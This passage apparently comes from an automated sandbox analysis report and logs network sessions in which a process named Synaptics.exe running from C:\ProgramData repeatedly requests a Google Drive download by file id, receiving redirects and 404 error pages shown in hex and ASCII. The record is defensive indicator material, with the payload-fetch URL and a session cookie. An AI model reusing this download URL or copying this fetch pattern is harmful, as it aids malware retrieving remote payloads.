                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UlEO4Lx6_3BtDzr2p5QBnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              93192.168.2.449875142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:21 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:22 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6CwQR9sf0jLn3NHLLeoej-k-1l5drsjFsd1j0mvqlTcqy-sKaut4w6i4HtnxmYyIlJ
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:22 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-KBQTsE4DM7dwDaqWe2ccSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:22 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:22 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 71 6b 63 65 65 39 56 31 43 5f 6d 44 6c 76 48 48 54 37 79 48 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="Cqkcee9V1C_mDlvHHT7yHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:22 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              94192.168.2.449876142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:21 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:22 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-TQBqqlvOZthSKs_dIEmBGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              95192.168.2.449877142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:21 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:22 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7ek4DTrJSkrOsL8HTQTi1aZNmyKRVi_VaihsDDPATtqvgqgtmGN1eSe6FluNvz9A9W
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:22 GMT
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-PVUMq_3d8Y9_mGPpznF8wQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:22 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:22 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 42 36 5f 4f 6a 51 6c 65 42 5a 61 62 4f 55 75 58 61 63 31 69 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="7B6_OjQleBZabOUuXac1iw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:22 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              96192.168.2.449878142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:22 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:23 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Saz7_PmBlx__B3bwO05mmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              97192.168.2.449879142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:22 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:23 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-h2KHBi8lXKoZxBnEn93VPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              98192.168.2.449880142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:23 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              99192.168.2.449883142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:23 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:24 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-nDCWO6hbdmn8WJpCcL3BUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              100192.168.2.449885142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:23 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:24 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7bwD9x-CW-GHrNkobMB7KQZ3cjIQJmiTR-CR0t6BnbdZcroDavlTrkBjCSIEyFMnZMRGsOu4s
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:24 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-3Wpzt7f35glZhQws6jFJIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:24 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:24 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 45 41 5f 5a 30 72 57 66 38 70 45 50 42 31 6e 62 59 5f 55 4b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="0EA_Z0rWf8pEPB1nbY_UKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:24 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
